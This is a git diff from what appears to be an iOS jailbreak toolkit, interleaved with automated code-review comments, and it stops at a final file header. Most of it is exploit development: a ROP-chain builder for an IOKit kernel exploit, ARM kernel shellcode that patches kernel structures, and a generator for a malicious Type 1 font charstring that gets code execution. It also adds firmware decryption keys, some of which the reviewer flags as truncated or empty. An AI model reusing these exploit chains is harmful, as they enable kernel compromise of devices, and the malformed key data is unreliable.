diff --git a/catalog/catalog.py b/catalog/catalog.py index 1361206..c7ec809 100644 --- a/catalog/catalog.py +++ b/catalog/catalog.py @@ -20,6 +20,11 @@ mode, device, version, cachefile, kernfile, patchfile, kcode, outfile = sys.argv[1:9] four_dot_three = '4.3' in version +if four_dot_three: + memcpy = '_memcpy$VARIANT$CortexA' + ('9' if device.startswith('iPad2') else '8') +else: + memcpy = '_memcpy' + assert mode in ['dejavu', 'untether'] patchfp = open(patchfile) @@ -29,14 +34,18 @@ def add_lib(conn, short, path): lib_paths.add(path) debugging = True +result_for = None def dbg_result(): + global result_for if debugging: + if result_for is None: + result_for = ptr('Result for %s was %08x\n', True) result, resultp = stackunkpair() store_r0_to(resultp) back = sys._getframe().f_back - funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True) + funcall('_fprintf', dmini.cur.sym('___stderrp'), result_for, ptr('%s:%d' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True) dmini.init(kernfile, False) @@ -59,14 +68,10 @@ def dbg_result(): weirdfile = pointed(weirdfile + I(sysent, count) + stuff) def mov_r0_r6(): - set_fwd('PC', dmini.cur.find('+ 30 46 70 bd')) - exhaust_fwd('R4', 'R5', 'R6') - heapadd(fwd('R4'), fwd('R5'), fwd('R6'), fwd('PC')) + gadget(PC='+ 30 46 70 bd', a='R4, R5, R6, PC') def str_r7_sp_856(): - set_fwd('PC', dmini.cur.find('+ d6 97 e9 bd')) - exhaust_fwd('R0', 'R3', 'R5', 'R6', 'R7') - heapadd(fwd('R0'), fwd('R3'), fwd('R5'), fwd('R6'), fwd('R7'), fwd('PC')) + gadget(PC='+ d6 97 e9 bd', a='R0, R3, R5, R6, R7, PC') def seek_kernel_ldm(reg): s = chr(0x90 | reg) + chr(0xe8) 
@@ -81,16 +86,16 @@ def seek_kernel_ldm(reg): if (i & 3) != 2: continue insn, = struct.unpack('I', data[i-2:i+2]) regs = [b for (n, b) in enumerate(['R0', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7', 'R8', 'R9', 'R10', 'R11', 'R12', 'SP', 'LR', 'PC']) if (insn & (1 << n))] - if 'SP' not in regs or 'PC' not in regs: continue - if 'R0' in regs or 'R7' in regs: continue + if 'SP' not in regs or 'PC' not in regs or 'LR' not in regs: continue + if 'R0' in regs or 'R6' in regs or 'R7' in regs: continue # got it return (dmini.cur.nth_segment(seg).start + i - 2, regs) seg += 1 -# 12_41, 31_41, 31_421: R6 -kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 6) +# 12_41, 31_41, 31_421: R6, no I lied +kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 2) #kernel_ldm = 0xdeadbeef init(*kernel_ldm_regs) @@ -100,6 +105,12 @@ def seek_kernel_ldm(reg): m = pointed('') set_fwd('SP', pointer(m)) heapadd(m) + +# mov pc, r9 +set_fwd('PC', dmini.cur.find('- 1e ff 2f e1 1e ff 2f e1')) +goo.fwds['PC'] = goo.fwds['LR'] +del goo.fwds['LR'] + mov_r0_r6() store_r0_to(obj) str_r7_sp_856() @@ -111,8 +122,8 @@ def seek_kernel_ldm(reg): set_fwd('PC', code_addr) -kstuff = finalize(None, must_be_simple=False, should_heapdump=False) -kstuff += '\0'*(856 + 0x38 + 4 - len(kstuff)) # xxx offset +kstuff = finalize(None, must_be_simple=False, should_heapdump=True); +kstuff.append('\0'*1024) def set_cache(cachefile): conn = dmini.Connection(cachefile, True) 
@@ -159,10 +170,18 @@ def do_main_thing(): funcall('_mach_task_self') store_r0_to(task_self_p) - set_r0_to(kstuffp); dbg_result() + if not four_dot_three: + funcall(memcpy, kstuffp, real_kstuffp, fake_kstuff_len) + + #funcall(memcpy, kstuffp, ptrI(0xdeadbeef, pointer(m), 0, 0, 0, 0, 0, 0x80002000, 0xdeadbeef, 0xdeadbee0), fake_kstuff_len) + + if debugging: + set_r0_to(kstuffp); dbg_result() # The manpage says this returns EINVAL, but in fact the kernel handles it. - funcall('_mlock', kstuffp, len(kstuff)); dbg_result() + funcall('_mlock', kstuffp, len(kstuff) if four_dot_three else (16 + fake_kstuff_len + len(kstuff))); dbg_result() + + #funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Opening %s\n', True), AppleRGBOUT, load_r0=True) funcall('iokit._IOServiceMatching', AppleRGBOUT) store_r0_to(matchingp) @@ -172,7 +191,6 @@ def do_main_thing(): funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result() else: # http://www.opensource.apple.com/source/IOKitUser/IOKitUser-502/FireWireTest.cpp?txt - #itp = ptrI(0) # XXX this is just for testing portp = ptrI(0) funcall('_mach_task_self') funcall('_mach_port_allocate', None, 1, portp); dbg_result() @@ -205,8 +223,6 @@ def do_main_thing(): funcall('iokit._IOConnectCallStructMethod', connect, 5, transactionp, len(transaction), 0, 0, load_r0=True); dbg_result() #funcall('_sleep', 1000) - #dbg_result(); funcall('_abort') - # do some housekeeping # (but don't bother if we're going to exec) 
@@ -241,20 +257,26 @@ def do_main_thing(): elif mode == 'dejavu': init('R4', 'R5', 'PC') -kstuffp = ptr(kstuff + '\0'*32) +if four_dot_three: + kstuffp = ptr(kstuff) +else: + fake_kstuff_len = 4 * len(kernel_ldm_regs) + kstuffp = ptr('\0' * fake_kstuff_len, align=8, align_offset=6) + real_kstuffp = ptr(kstuff) zerop = ptrI(0) -AppleRGBOUT = ptr('AppleM2TVOut' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True) +AppleRGBOUT = ptr('AppleM2CLCD' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True) # if four_dot_three else 'AppleCLCD', True) connect = ptrI(0) fail_callback = ptrI(dmini.cur.sym('_getpid'), 0xeeeeeeee) transaction = troll_string('\x00' * (0xd8 if four_dot_three else 0x8c)) transaction[0:4] = transaction[4:8] = I(0xeeeeeeee) -transaction[8:0xc] = I(kstuffp) # surface saved in r11 transaction[0x58:0x5c] = I(kernel_ldm) if four_dot_three: transaction[0xb8:0xbc] = I(6) # run iterations 1 and 2 (first loop bails at 1) + transaction[8:0xc] = I(kstuffp) # surface saved in r11 else: - transaction[0x70:0x74] = I(6) + transaction[0x70:0x74] = I(kstuffp) # overlapping the address and "6" + transaction[8:0xc] = I(0xdeadbeef) # no idea transaction = simplify(transaction) transactionp = ptr(transaction) if mode == 'dejavu': @@ -291,6 +313,6 @@ def do_main_thing(): init_sp = 0x10031000 address = 0x8000 - final = finalize(address) - #heapdump(final) + final = finalize(address, should_heapdump=True) open(outfile, 'w').write(pickle.dumps({'segment': final, 'initializer': initializer, 'init_sp': init_sp, 'rop_address': address, 'libs': lib_paths, 'dylib': False})) + diff --git a/catalog/kcode.S b/catalog/kcode.S index d24b4b2..91eb45c 100644 --- a/catalog/kcode.S +++ b/catalog/kcode.S 
@@ -8,14 +8,26 @@ .arm start: # xxx offset - ldr sp, [sp, #(856 + 0x38 - 0x98)] + ldr sp, [sp, #(856 + 0x40 - 0xa0)] sub sp, #0x18 +#if 0 + mov r5, sp; mov sp, #0x80000000; orr sp, #0x2000; mov pc, #-1 +#endif + +#if VERSION >= 0x040206 && VERSION < 0x040300 + ldr r6, [sp, #(0x3c - 0x30 - 0x24)] +#else ldr r6, [r4] +#endif adr r0, inspiring bl _IOLog + #mov r0, #105 + #mov r1, #9 + #blx _proc_signal + #mov r8, #0; b end adr r5, stuff @@ -42,6 +54,14 @@ end: str r8, [r6, #c(0x238, 0x19c)] str r8, [r6, #c(0x2d4, 0x238)] # fix up linked lists +#if 0 && (VERSION < 0x040300) + add r0, r6, #0x170 + str r0, [r6, #0x170] + str r0, [r6, #0x174] + add r0, r6, #0x178 + str r0, [r6, #0x178] + str r0, [r6, #0x17c] +#endif add r0, r6, #c(0x218, 0x180) str r0, [r6, #c(0x21c, 0x184)] add r0, r6, #c(0x220, 0x188) @@ -79,7 +99,7 @@ syscall_0: mov r1, #0 str r1, [r0, #0xc] str r1, [r0, #0x10] - ldr r0, [r0, #0x6c] + ldr r0, [r0, #c(0x6c, 0x80)] cmp r0, #0 strne r1, [r0, #8] #endif diff --git a/common/common.h b/common/common.h index e3cf255..309923d 100644 --- a/common/common.h +++ b/common/common.h @@ -38,9 +38,9 @@ static void _assert_zero_helper(const char name[], const char *arg, unsigned int #endif #ifdef PROFILING -#define TIME(thing) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0) +#define TIME(thing...) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0) #else -#define TIME(thing) thing +#define TIME(thing...) do { thing; } while(0) #endif static inline uint64_t time_ms() { diff --git a/config/keyz.txt b/config/keyz.txt index 80bac63..d47304e 100644 --- a/config/keyz.txt +++ b/config/keyz.txt 
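Review bot: The non-profiling `TIME(thing...)` in common/common.h now expands to a `do { thing; } while(0)` statement, so any caller that used `TIME(x)` as an expression no longer compiles, and the named variadic parameter `thing...` is a GNU extension. The standard spelling is `#define TIME(...) do { __VA_ARGS__; } while(0)`, with `#__VA_ARGS__` in the PROFILING variant. A short comment above the macro, for example `/* accepts several comma-separated expressions; they are timed as one unit */`, would explain why it became variadic.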
@@ -492,3 +492,54 @@ iPhone3,1_4.3.3_8J2.iBSS: 8ef00005aa2c01ae409d55e330171589af79d76ac86639e7600383 iPhone3,1_4.3.3_8J2.iBEC: 54800715047034f61f786642e9caea65723ff410495dc68e7125c0519add859b e9467d0a0d35b1f2bcec6d0a60d0b499 iPhone3,1_4.3.3_8J2.KernelCache: 65c351330f824889fe25b14e2d0cb5e291991a749f13761b825a70f317f005aa 301c0db0f6fc3a92c34f34b2dff5d92f +iPhone3,3_4.2.6_8E200.fs: 723ded674deb1cba56a142542a0b06d2a483297f8056c0cfa70346c0724e1b0e03feded6 +iPhone3,3_4.2.6_8E200.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.6_8E200.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.6_8E200.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.6_8E200.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3 +iPhone3,3_4.2.6_8E200.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.6_8E200.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.6_8E200.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.6_8E200.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e +iPhone3,3_4.2.6_8E200.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.6_8E200.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.6_8E200.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.6_8E200.iBSS: 
cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.6_8E200.KernelCache: c31ace63b79048c5e1071201e07f8a6f23444e5062d57397a3b3d84ae68dc008 eef93c11b4795bb4b34ffb1cdd63713a +iPhone3,3_4.2.6_8E200.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.6_8E200.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + +iPhone3,3_4.2.7_8E303.fs: 612f78042ddc5337ab1abecfb59a07e88ed3e80665a035ef02c3c48045057fc29ab0a4b5 +iPhone3,3_4.2.7_8E303.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.7_8E303.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.7_8E303.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.7_8E303.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3 +iPhone3,3_4.2.7_8E303.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.7_8E303.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.7_8E303.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.7_8E303.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e +iPhone3,3_4.2.7_8E303.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.7_8E303.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.7_8E303.iBoot: 
acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.7_8E303.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.7_8E303.KernelCache: b953f74572156c933368875730f4d97ac09ba66d17dbcf1ef169894d35ceff61 72032759def5211d217f26473d668430 +iPhone3,3_4.2.7_8E303.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.7_8E303.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + +iPhone3,3_4.2.8_8E401.fs: d8e162215f27c016ed8d1849c6059f99984c766c72cec4a1df63724491c8e5b19c0e6fb2 +iPhone3,3_4.2.8_8E401.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd +iPhone3,3_4.2.8_8E401.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3 +iPhone3,3_4.2.8_8E401.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b +iPhone3,3_4.2.8_8E401.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cb47cb1f3 +iPhone3,3_4.2.8_8E401.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03 +iPhone3,3_4.2.8_8E401.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7 +iPhone3,3_4.2.8_8E401.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc +iPhone3,3_4.2.8_8E401.GlyphCharging: +iPhone3,3_4.2.8_8E401.GlyphPlugin: 28b7fcbd208ee5e467cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741 +iPhone3,3_4.2.8_8E401.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c +iPhone3,3_4.2.8_8E401.iBoot: 
acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4 +iPhone3,3_4.2.8_8E401.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45 +iPhone3,3_4.2.8_8E401.KernelCache: 21dc139511829abfb346d78f9c1c17d50bff33716e7619fee8338b99025ffa3e 851c4efdb0db569f39549e5a13e0784a +iPhone3,3_4.2.8_8E401.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa +iPhone3,3_4.2.8_8E401.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1 + diff --git a/data b/data index bbe6272..be67f52 160000 --- a/data +++ b/data @@ -1 +1 @@ -Subproject commit bbe627215be78161abef59253dff3f12f21cecfa +Subproject commit be67f52507d9607e4353d1d91d379eec1a8ea347 diff --git a/dejavu/gen_dejavu.raw.py b/dejavu/gen_dejavu.raw.py index 8364d0e..8c91eb0 100644 --- a/dejavu/gen_dejavu.raw.py +++ b/dejavu/gen_dejavu.raw.py @@ -124,7 +124,7 @@ def encode_unknown(s): diffs_seen = set() for data in sorted(stuff, key=lambda d: d['personality'] - d['actual_parse_callback']): - diff = data['personality'] - data['actual_parse_callback'] + diff = data['personality'] - data['actual_parse_callback'] - 1 if diff in diffs_seen: raise Exception('duplicate') diffs_seen.add(diff) @@ -132,7 +132,7 @@ def encode_unknown(s): assert data['parse_callback'] > 32000 assert data['actual_parse_callback'] > 32000 - le_chain += str(subrno) + ' 1 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n' + le_chain += str(subrno) + ' 4 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n' subr = '''1 1 25 callothersubr % get parse_callback {actual_pc} 2 21 callothersubr % subtract the real one 
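Review bot: Four of the added `iPhone3,3_4.2.8_8E401` entries in config/keyz.txt do not have the shape of the same entries in the 4.2.6 and 4.2.7 blocks. `GlyphCharging` has no value at all, the second field of `BatteryFull` is 31 hex digits instead of 32, and the first field of `GlyphPlugin` and of `LLB` is 63 hex digits instead of 64. Most other per-image values in this block are identical to the earlier two blocks, so these look like copy errors rather than different data. Whatever parses this file should reject a line whose fields do not have the expected hex lengths, so that a truncated entry fails at load time instead of producing a wrong result later.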
@@ -203,7 +203,7 @@ def encode_unknown(s): 0 0 0 3 0 callothersubr 2 2 24 callothersubr % buildchar -> bca[2] - -150 42 callothersubr % back up to 398 get gxx_personality_sj0 + -152 42 callothersubr % back up to 398 get gxx_personality_sj0 setcurrentpoint hstem3 hstem3 hstem3 hstem3 @@ -213,9 +213,19 @@ def encode_unknown(s): hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 hstem3 - 252 42 callothersubr % this had better get us to 20 (or actually 0!) down when it does 31000 stuff + %252 42 callothersubr % this had better get us to 20 (or actually 0!) down when it does 31000 stuff + + 0 12 callothersubr % actually, enforce that we're at 0 31000 3 2 24 callothersubr % idx = 31000 + + 1 1 25 callothersubr % first + 1 1 25 callothersubr % second + 2 div % / 2 + 2 2 22 callothersubr % * 2 + 2 21 callothersubr % x - ((x / 2) * 2) + 2 2 20 callothersubr % + 2, so it's 1 or 2 + callsubr 3 callsubr % flex again 0 0 0 3 0 callothersubr % personality @@ -224,14 +234,6 @@ def encode_unknown(s): 4 2 24 callothersubr % store to 4 hmoveto % ignore x - 1 1 25 callothersubr % first - 1 1 25 callothersubr % second - 2 div % / 2 - 2 2 22 callothersubr % * 2 - 2 21 callothersubr % x - ((x / 2) * 2) - callsubr - - {le_chain} diff --git a/fs/fs.h b/fs/fs.h index 23287df..d8464b8 100644 --- a/fs/fs.h +++ b/fs/fs.h 
@@ -17,7 +17,11 @@ uio_t x_uio_createwithbuffer(int a_iovcount, off_t a_offset, int a_spacetype, in void x_vnode_reclaim_internal(struct vnode * vp, int locked, int reuse, int flags) asm("$bl3__vnode_recycle"); #define vnode_reclaim_internal x_vnode_reclaim_internal -errno_t x_vn_create(vnode_t, vnode_t *, struct nameidata *, struct vnode_attr *, int flags, int mode, int unk, vfs_context_t) +#if VERSION >= 0x040300 +errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct nameidata *ndp, struct vnode_attr *vap, int flags, int mode, int unk, vfs_context_t ctx) +#else +errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct componentname *cnp, struct vnode_attr *vap, int flags, vfs_context_t ctx) +#endif asm("$strref_22_76_6e_6f_64_65_5f_63_72_65_61_74_65_3a_20_75_6e_6b_6e_6f_77_6e_20_76_74_79_70_65_20_25_64"); // '"vnode_create: unknown vtype %d' #define vn_create x_vn_create @@ -173,7 +177,9 @@ asm("$ldr_$_T_df_f8_fc_31_1b_68_6b_b1"); #endif extern void IOLog(const char *fmt, ...) __attribute__((format (printf, 1, 2))); -#if !DEBUG_PRINTF +#if DEBUG_PRINTF +#define printf IOLog +#else #define printf(args...) ((void) (args)) #endif diff --git a/fs/union/union_subr.c b/fs/union/union_subr.c index bc0d3cf..999690e 100644 --- a/fs/union/union_subr.c +++ b/fs/union/union_subr.c @@ -1046,7 +1046,11 @@ union_mkshadow(um, dvp, cnp, vat, vpp) VATTR_SET(&va, va_change_time, vat->va_change_time); //VATTR_SET(&va, va_backup_time, vat->va_backup_time); +#if VERSION >= 0x040300 error = vn_create(dvp, vpp, CNTOND(&cn), &va, 0, 0, 0, cnp->cn_context); +#else + error = vn_create(dvp, vpp, &cn, &va, 0, cnp->cn_context); +#endif out: if ((cn.cn_flags & HASBUF) == HASBUF) { FREE_ZONE(cn.cn_pnbuf, cn.cn_pnlen, M_NAMEI); 
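Review bot: Both `x_vn_create` prototypes in fs/fs.h depend on `#if VERSION >= 0x040300`, and the preprocessor evaluates an undefined `VERSION` as 0, so a build that forgets to define it silently gets the six-argument prototype. Because the symbol is bound through an `asm` label rather than a real declaration, a mismatch would appear as a call with the wrong argument layout and not as a compile error. Where `VERSION` is defined is not visible here; if it comes from the build command line, add `#ifndef VERSION` / `#error "VERSION must be defined"` / `#endif` near the top of the header. The same test guards the `vn_create` call sites in fs/union/union_subr.c and the load in catalog/kcode.S.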
@@ -1200,7 +1204,11 @@ union_vn_create(struct vnode **vpp, struct union_node *un, mode_t cmode, vfs_con VATTR_SET(vap, va_type, VREG); VATTR_SET(vap, va_mode, cmode); +#if VERSION >= 0x040300 if ((error = vn_create(un->un_dirvp, &vp, CNTOND(&cn), vap, 0, 0, 0, context)) != 0) { +#else + if ((error = vn_create(un->un_dirvp, &vp, &cn, vap, 0, context)) != 0) { +#endif goto out; } diff --git a/fs/union/union_vnops.c b/fs/union/union_vnops.c index cf30b99..4844acc 100644 --- a/fs/union/union_vnops.c +++ b/fs/union/union_vnops.c @@ -230,8 +230,16 @@ union_lookup(struct vnop_lookup_args *ap) uppervp = NULLVP; lowervp = NULLVP; printf("in: %p RC=%d / %d\n", dun->un_uppervp, dun->un_uppervp ? dun->un_uppervp->v_iocount : -1, uppervp ? uppervp->v_iocount : -1); + + char slash = cnp->cn_nameptr[cnp->cn_namelen] != 0; - printf("looking up %s lp=%d wp=%d nameiop=%d upperdvp=%p lowerdvp=%p\n", cnp->cn_nameptr, old_flags & LOCKPARENT, old_flags & WANTPARENT, cnp->cn_nameiop, upperdvp, lowerdvp); + const char *nameiop = "?"; + switch(cnp->cn_nameiop) { + #define A(x) case x: nameiop = #x; break; + A(LOOKUP) A(CREATE) A(DELETE) A(RENAME) + #undef A + } + printf("looking up %s(%d) lp=%d wp=%d nameiop=%s upperdvp=%p lowerdvp=%p slash=%d\n", cnp->cn_nameptr, (int) cnp->cn_namelen, old_flags & LOCKPARENT, old_flags & WANTPARENT, nameiop, upperdvp, lowerdvp, (int) slash); union_unlock(); 
@@ -247,24 +255,16 @@ union_lookup(struct vnop_lookup_args *ap) * on and just return that vnode. */ if(um->um_uppervp != NULLVP && upperdvp != NULLVP) { - printf("lin: %p RC=%d\n", upperdvp, upperdvp ? upperdvp->v_iocount : -1); uerror = union_lookup1(um->um_uppervp, &upperdvp, &uppervp, cnp); - printf("lout: %p RC=%d\n", upperdvp, upperdvp ? upperdvp->v_iocount : -1); - if (cnp->cn_consume != 0) { + if(cnp->cn_consume != 0 || (!uerror && !vnode_isdir(uppervp))) { vnode_get(*ap->a_vpp = uppervp); error = uerror; goto out; } - if(!uerror && !vnode_isdir(uppervp)) { - vnode_get(*ap->a_vpp = uppervp); - error = uerror; - goto out; - } - - if(uerror && uerror != ENOENT) { + if(uerror && uerror != ENOENT && uerror != EJUSTRETURN) { error = uerror; goto out; } @@ -284,13 +284,13 @@ union_lookup(struct vnop_lookup_args *ap) lerror = union_lookup1(um->um_lowervp, &lowerdvp, &lowervp, cnp); - if (cnp->cn_consume != 0 || (!lerror && !vnode_isdir(lowervp))) { + if(cnp->cn_consume != 0 || (!lerror && !vnode_isdir(lowervp))) { vnode_get(*ap->a_vpp = lowervp); error = lerror; goto out; } - if(lerror && lerror != ENOENT) { + if(lerror && lerror != ENOENT && lerror != EJUSTRETURN) { error = lerror; goto out; } @@ -324,7 +324,11 @@ union_lookup(struct vnop_lookup_args *ap) /* case 1. */ if ((uerror != 0) && (lerror != 0)) { - error = uerror; + if(lerror == EJUSTRETURN || uerror == EJUSTRETURN) { + error = EJUSTRETURN; + } else { + error = uerror == ENOENT ? lerror : uerror; + } goto out; } 
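Review bot: In the merged upper-layer check, `vnode_get(*ap->a_vpp = uppervp)` is reached whenever `cnp->cn_consume != 0`, including when `uerror` is set. `uppervp` was initialised to `NULLVP` earlier in `union_lookup`, so unless `union_lookup1` always fills it in, this passes a null vnode to `vnode_get` in kernel context. The old code had the same path, so the merge preserves it rather than introducing it. Assign first and take the reference only when there is one: `*ap->a_vpp = uppervp; if(uppervp != NULLVP) vnode_get(uppervp);`, and do the same for `lowervp` in the next hunk. `union_lookup` starts and ends outside this hunk.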
@@ -377,18 +381,18 @@ union_lookup(struct vnop_lookup_args *ap) cnp->cn_flags = (cnp->cn_flags & ~(LOCKPARENT | WANTPARENT)) | old_flags; - if(*ap->a_vpp && cnp->cn_nameiop == DELETE) { - *CHUD(current_thread()) = !vnode_isdir(*ap->a_vpp); + if(cnp->cn_nameiop == DELETE) { + *CHUD(current_thread()) = *ap->a_vpp != NULLVP && !vnode_isdir(*ap->a_vpp); } // sigh - if(((error == EJUSTRETURN && cnp->cn_nameiop == RENAME) ? + if(!slash && + ((error == EJUSTRETURN && cnp->cn_nameiop == RENAME) ? *CHUD(current_thread()) : !((uppervp != NULLVP && vnode_isdir(uppervp)) || - (lowervp != NULLVP && vnode_isdir(lowervp)))) && + (lowervp != NULLVP && vnode_isdir(lowervp)))) && (cnp->cn_nameiop == CREATE || - cnp->cn_nameiop == RENAME || - 0/*cnp->cn_nameiop == DELETE*/) && + cnp->cn_nameiop == RENAME) && (error == 0 || error == EJUSTRETURN)) { printf("mega hack %p %p %p\n", ap->a_vpp[1], upper(ap->a_vpp[1]), lower(ap->a_vpp[1])); @@ -402,6 +406,11 @@ union_lookup(struct vnop_lookup_args *ap) vnode_get(ap->a_vpp[1] = newvp); vnode_put(ovp); if(locked) vnode_lock(newvp); + if(cnp->cn_nameiop == RENAME && *ap->a_vpp != NULLVP && newvp->v_mount != (*ap->a_vpp)->v_mount) { + vnode_put(*ap->a_vpp); + *ap->a_vpp = NULLVP; + if(error == 0) error = EJUSTRETURN; + } } } } @@ -427,6 +436,8 @@ union_create(struct vnop_create_args *ap) struct vnode *dvp = upper_or_lower(ap->a_dvp); struct componentname *cnp = ap->a_cnp; + printf("union_create %p %s\n", dvp, cnp->cn_nameptr); + if (dvp != NULLVP) { int error; struct vnode *vp; @@ -441,7 +452,7 @@ union_create(struct vnop_create_args *ap) return (error); /* if this is faulting filesystem and is a reg file, skip allocation of union node */ - if (UNNODE_FAULTIN(un) && (vp != NULLVP) && ((vnode_isreg(vp) != 0)|| (vnode_islnk(vp) != 0))) { + if(vp != NULLVP && !vnode_isdir(vp)) { *ap->a_vpp = vp; return(0); } diff --git a/goo/goo.py 